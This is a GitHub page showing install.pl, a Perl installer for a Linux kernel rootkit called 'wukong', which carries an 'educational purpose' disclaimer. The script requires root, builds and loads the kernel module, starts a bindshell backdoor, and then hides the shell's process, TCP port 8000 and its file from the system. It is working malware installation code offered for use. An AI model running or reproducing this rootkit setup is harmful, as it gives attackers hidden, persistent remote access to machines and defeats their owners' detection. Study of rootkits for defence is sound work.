-
Notifications
You must be signed in to change notification settings - Fork 28
/
install.pl
executable file
·79 lines (65 loc) · 1.68 KB
/
install.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/perl -U
=pod
* Copyright 2014-2015 Jerry Han ([email protected])
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 3 as
* published by the Free Software Foundation.
*
* Note:
* This kernel rootkit is just for educational purpose and it shouldn't
* be used for any illegal activities, use this at your own risk.
=cut
use strict;
use warnings;
sub error()
{
print "[-] installation failed ! please check error message !";
exit;
}
sub check_root()
{
my $id = getpwuid($<);
if ($id ne "root") {
print "[-] error ! installation must be set with uid 0 (root), can not continue ! exit !\n";
exit;
}
else {
print "[+] installing as root user !\n";
}
}
sub install()
{
if (`uname -a` =~ /x86_64/) {
system("cd lkm; make linux-x86_64");
}
else {
system("cd lkm; make linux-x86");
}
if (-e "lkm/wukong.ko") {
print "[+] lkm compiled successfully !\n";
}
else {
error();
}
system("rmmod wukong");
system("cd lkm; insmod wukong.ko");
print "\n[+] wukong installed ! \n";
system("killall bindshell");
system("cd app; make");
system("./app/bindshell");
sleep(1);
my $pid = `cat /tmp/log_hidden_pid`;
system("rm -rf /tmp/log_hidden_pid");
chomp($pid);
print "\nhide bindshell process, pid=$pid! \n";
system("./app/wukong 1 $pid");
print "\nhide tcp 8000! \n";
system("./app/wukong 3 8000");
print "\nhide bindshell file! \n";
system("./app/wukong 5 bindshell");
exit;
}
# main
check_root();
install();